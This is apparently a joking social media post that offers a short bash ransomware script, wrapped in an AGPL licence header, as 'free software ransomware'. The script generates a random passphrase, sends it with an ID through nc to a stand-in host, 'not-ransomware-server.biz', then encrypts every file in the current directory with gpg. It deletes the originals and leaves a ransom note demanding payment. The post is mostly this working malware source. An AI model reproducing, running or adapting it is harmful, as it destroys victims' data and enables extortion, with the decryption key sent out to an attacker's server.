Notices where this attachment appears
-
Embed this notice
@yura @papush @lumi GNU/Jihad against "FOSS"!!!
Free software ransomware is extremely trivial to write really;
#!/bin/bash
# Copyright © 2024 翠星石
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
RANDOM_PASSWORD="$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM"
ID="$RANDOM$RANDOM"
echo $ID:$RANDOM_PASSWORD | nc not-ransomware-server.biz 6969
find . -type f -exec gpg --symmetric --batch --passphrase $RANDOM_PASSWORD {} \;
find . -type f -not -name '*.gpg' -exec rm {} \;
echo "All your files have been encrypted, make a breadstick payment to <x> and quote ID: $ID to receive a decryption password." > README-encrypted.txt